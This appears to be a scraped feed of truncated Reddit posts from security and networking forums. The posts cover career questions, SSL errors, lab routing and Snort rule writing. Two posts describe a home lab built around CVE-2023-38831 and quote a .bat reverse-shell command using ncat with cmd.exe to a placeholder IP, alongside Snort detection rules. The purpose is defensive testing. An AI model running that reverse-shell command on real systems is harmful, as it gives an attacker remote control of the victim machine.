Hi everyone, Im currently trying to detect a reverse TCP connection from W10 to Kali. The attack is initially based off CVE-2023-38831 , where the bait file will rule a .bat script once opened. Currently, my .bat file looks like this: echo off ncat xx.xx.xx.xx 4444 -e cmd.exe Now heres the problem, my alert rule is able to detect the attack but when i change the alert to block, it does not seem to be able to block the attack. What should i do? my alert rule: alert tcp $HOME_NET 4444 -> $EXTERNAL_NET any (msg:"[MITRE ATT&CK T1204.002] User Execution: Malicious File"; sid:10000001; rev:1 ..read more

I have a bachelors in cybersecurity. However - my job is more of a Model-Based Systems Engineer, I need to understand telecom, network and Linux more in depth. I believe I may have to branch out of the cybersecurity degree and may have to get a Systems Engineering or Network Engineering degree. Looking at below $10k because my employer only covers $3k for the entire year. Scholarships would be a great plus. submitted by /u/picante-x [visit reddit] [comments ..read more

Hi everyone, Im currently trying to detect a reverse TCP connection from W10 to Kali. The attack is initially based off CVE-2023-38831 , where the bait file will rule a .bat script once opened. Currently, my .bat file looks like this: echo off ncat xx.xx.xx.xx 4444 -e cmd.exe So heres the issue, i cant seem to think of anything to put in the content field for my Snort rule. I've tried ncat, (the ip), and others but nothing seems to be alerting snort. Do you guys have any idea as to how i can do it? Heres my current rule: alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"[MITRE ATT&CK ..read more

submitted by /u/albinowax [visit reddit] [comments ..read more

submitted by /u/elliotkillick [visit reddit] [comments ..read more

Hey everyone! My friend’s information security certification institute is giving friends and family codes (good through the new year) to us and I wanted to pass it along. X63CTE7TVC66 submitted by /u/HedgehogCritical7645 [visit reddit] [comments ..read more

I've read these stuffs: We've tried mobile data and different ISPs and the problem seems to persist. https://maulwuff.de/research/ssl-debugging.html https://serverfault.com/questions/872424/why-are-some-people-getting-a-connection-not-secure-page-when-accessing-my-serve Would ssl pinning fix this issue of very few clients getting ssl error? https://developers.wultra.com/components/ssl-pinning-android/1.3.x/documentation/ There is an option to install CA cert on android, but is it worth the hassle or is there something simpler and efficient? I honestly don't understand why the hell I'm getting ..read more

just to note i'm super new to networking. I have this assignment where i have to make all the devices in this network be able to ping each other. So far the the pcs in buildings 1 and 2 can ping each other and they can ping both the core and gateway router. But when I try to ping the server from the pcs I get the 'destination host unreachable' error. I have static routes that direct all traffic to the right interface on the gateway and core routers. (the server can ping the gateway router, and also fyi when I try to ping the pcs from the server it doesn't say 'destination unreachable', just ..read more

submitted by /u/zolakrystie [visit reddit] [comments ..read more

Hi everyone, I have been offered a role as an Analyst on a Cyber Monitoring team. I have no technical CS background but have experience in information systems and business processes. I did well in my interview because I researched and conceptually understood the value of educating people and using certain safeguards to defend organizational information. The role would be a pivot into a new field and I believe I would excel in reporting writing. This said, I am curious as to whether I would require a coding background/knowledge to really thrive and build a career in the space long term? What a ..read more